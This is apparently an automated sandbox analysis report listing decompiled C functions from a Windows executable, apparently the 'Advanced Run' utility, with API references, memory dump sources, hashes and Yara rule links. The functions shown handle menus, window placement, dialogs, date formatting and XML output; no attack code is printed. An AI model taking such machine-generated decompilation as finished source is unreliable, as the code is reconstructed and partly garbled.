                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscat
                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                      • API String ID: 384018552-4153097237
                                                                                      • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                      • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 42%
                                                                                      			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                      0x0040605e
                                                                                      0x00406061
                                                                                      0x00406069
                                                                                      0x00406074
                                                                                      0x0040607a
                                                                                      0x0040607e
                                                                                      0x00406082
                                                                                      0x00406148
                                                                                      0x0040614e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406088
                                                                                      0x00406088
                                                                                      0x00406093
                                                                                      0x00406098
                                                                                      0x0040609f
                                                                                      0x004060ae
                                                                                      0x004060b6
                                                                                      0x004060be
                                                                                      0x004060c6
                                                                                      0x004060ca
                                                                                      0x004060cf
                                                                                      0x004060d7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004060de
                                                                                      0x00406129
                                                                                      0x00406129
                                                                                      0x0040612d
                                                                                      0x0040612f
                                                                                      0x00406130
                                                                                      0x00406134
                                                                                      0x00406137
                                                                                      0x0040613c
                                                                                      0x0040613c
                                                                                      0x00000000
                                                                                      0x0040612d
                                                                                      0x004060e7
                                                                                      0x004060f0
                                                                                      0x004060f2
                                                                                      0x004060f2
                                                                                      0x004060f9
                                                                                      0x004060fd
                                                                                      0x00406102
                                                                                      0x0040610c
                                                                                      0x00406112
                                                                                      0x00406117
                                                                                      0x00406117
                                                                                      0x00406104
                                                                                      0x00406104
                                                                                      0x00406104
                                                                                      0x00406104
                                                                                      0x00406102
                                                                                      0x00406122
                                                                                      0x00406128
                                                                                      0x00000000
                                                                                      0x0040613f
                                                                                      0x0040613f
                                                                                      0x00406140
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 2029023288-3849865405
                                                                                      • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                      • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 82%
                                                                                      			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                      0x00402bee
                                                                                      0x00402bf8
                                                                                      0x00402cae
                                                                                      0x00402c08
                                                                                      0x00402c10
                                                                                      0x00402c11
                                                                                      0x00402c12
                                                                                      0x00402c13
                                                                                      0x00402c20
                                                                                      0x00402c27
                                                                                      0x00402c2e
                                                                                      0x00402c30
                                                                                      0x00402c37
                                                                                      0x00402c4b
                                                                                      0x00402c50
                                                                                      0x00402c53
                                                                                      0x00402c55
                                                                                      0x00402c3e
                                                                                      0x00402c3e
                                                                                      0x00402c41
                                                                                      0x00402c41
                                                                                      0x00402c5a
                                                                                      0x00402c60
                                                                                      0x00402c65
                                                                                      0x00402c68
                                                                                      0x00402c6d
                                                                                      0x00402c77
                                                                                      0x00402c7c
                                                                                      0x00402c7e
                                                                                      0x00402c87
                                                                                      0x00402ca5
                                                                                      0x00402ca5
                                                                                      0x00402c87
                                                                                      0x00402c7c
                                                                                      0x00402c6d
                                                                                      0x00000000
                                                                                      0x00402cac

                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                      • GetSystemMetrics.USER32 ref: 00402C23
                                                                                      • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                      • GetSystemMetrics.USER32 ref: 00402C30
                                                                                      • GetSystemMetrics.USER32 ref: 00402C47
                                                                                      • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$Window
                                                                                      • String ID:
                                                                                      • API String ID: 1155976603-0
                                                                                      • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                      • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                      0x004036ef
                                                                                      0x004036f6
                                                                                      0x0040370b
                                                                                      0x00403712
                                                                                      0x00403717
                                                                                      0x0040371c
                                                                                      0x0040371f
                                                                                      0x0040372c
                                                                                      0x00403735
                                                                                      0x00403738
                                                                                      0x00403744
                                                                                      0x00403751
                                                                                      0x00403758
                                                                                      0x00403760
                                                                                      0x00403769
                                                                                      0x0040376c
                                                                                      0x00403778
                                                                                      0x0040377b
                                                                                      0x0040378b
                                                                                      0x00403792
                                                                                      0x00403795
                                                                                      0x00403798
                                                                                      0x0040379b
                                                                                      0x004037a2
                                                                                      0x004037a5
                                                                                      0x004037a8
                                                                                      0x004037af
                                                                                      0x004037b7
                                                                                      0x004037c3
                                                                                      0x00000000
                                                                                      0x004037d4
                                                                                      0x004037dc

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004036F6
                                                                                      • memset.MSVCRT ref: 00403712
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                        • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                        • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                      • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                      • wcscpy.MSVCRT ref: 004037C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                      • String ID: L$cfg
                                                                                      • API String ID: 275899518-3734058911
                                                                                      • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                      • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                      0x00404ed0
                                                                                      0x00404edf
                                                                                      0x00404ef6
                                                                                      0x00000000
                                                                                      0x00404f00
                                                                                      0x00404f1c
                                                                                      0x00404f31
                                                                                      0x00404f41
                                                                                      0x00404f4e
                                                                                      0x00404f5d
                                                                                      0x00404f66
                                                                                      0x00404f69
                                                                                      0x00404f69
                                                                                      0x00404f71
                                                                                      0x00404f77
                                                                                      0x00404f7d

                                                                                      APIs
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                      • wcscpy.MSVCRT ref: 00404F41
                                                                                      • wcscat.MSVCRT ref: 00404F4E
                                                                                      • wcscat.MSVCRT ref: 00404F5D
                                                                                      • wcscpy.MSVCRT ref: 00404F71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1331804452-0
                                                                                      • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                      • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 71%
                                                                                      			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                      0x00404fe0
                                                                                      0x00404fe9
                                                                                      0x00405000
                                                                                      0x00405005
                                                                                      0x00405009
                                                                                      0x0040500c
                                                                                      0x0040500e
                                                                                      0x00405015
                                                                                      0x00405016
                                                                                      0x00405021
                                                                                      0x00405026
                                                                                      0x00405027
                                                                                      0x0040502c
                                                                                      0x00405031
                                                                                      0x00405039
                                                                                      0x0040503f
                                                                                      0x00405044
                                                                                      0x00405048
                                                                                      0x0040504e
                                                                                      0x00405056
                                                                                      0x0040505c
                                                                                      0x0040504e
                                                                                      0x00405065
                                                                                      0x0040506a
                                                                                      0x00405072
                                                                                      0x00405079

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2521778956-791839006
                                                                                      • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                      • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 42%
                                                                                      			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                      0x00407d9c
                                                                                      0x00407d9e
                                                                                      0x00407da5
                                                                                      0x00407db3
                                                                                      0x00407dba
                                                                                      0x00407dc5
                                                                                      0x00407dc7
                                                                                      0x00407dd0
                                                                                      0x00407dc9
                                                                                      0x00407dc9
                                                                                      0x00407dc9
                                                                                      0x00407dd8
                                                                                      0x00407de1
                                                                                      0x00407de5
                                                                                      0x00407deb
                                                                                      0x00407df2
                                                                                      0x00407df3
                                                                                      0x00407dfe
                                                                                      0x00407e03
                                                                                      0x00407e04
                                                                                      0x00407e21

                                                                                      APIs
                                                                                      Strings
                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                      • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                      • <%s>, xrefs: 00407DF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                      • API String ID: 3473751417-2880344631
                                                                                      • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                      • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 70%
                                                                                      			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                      0x00403b56
                                                                                      0x00403b5d
                                                                                      0x00403b6f
                                                                                      0x00403b76
                                                                                      0x00403b82
                                                                                      0x00403b8d
                                                                                      0x00403b8e
                                                                                      0x00403b99
                                                                                      0x00403b9e
                                                                                      0x00403b9f
                                                                                      0x00403ba7
                                                                                      0x00403bb9
                                                                                      0x00403bce
                                                                                      0x00403be5
                                                                                      0x00403bef
                                                                                      0x00403bf8
                                                                                      0x00403c00

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403B5D
                                                                                      • memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                        • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                        • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                        • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                      • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                      • API String ID: 1832587304-479876776
                                                                                      • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                      • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                      0x0040afd3
                                                                                      0x0040afe2
                                                                                      0x0040aff3
                                                                                      0x0040b002
                                                                                      0x0040b023
                                                                                      0x00000000
                                                                                      0x0040b047
                                                                                      0x0040b02e
                                                                                      0x0040b034
                                                                                      0x0040b03c
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • wcscpy.MSVCRT ref: 0040AFD3
                                                                                      • wcscat.MSVCRT ref: 0040AFE2
                                                                                      • wcscat.MSVCRT ref: 0040AFF3
                                                                                      • wcscat.MSVCRT ref: 0040B002
                                                                                      • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                        • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                      Strings
                                                                                      Memory Dump Source
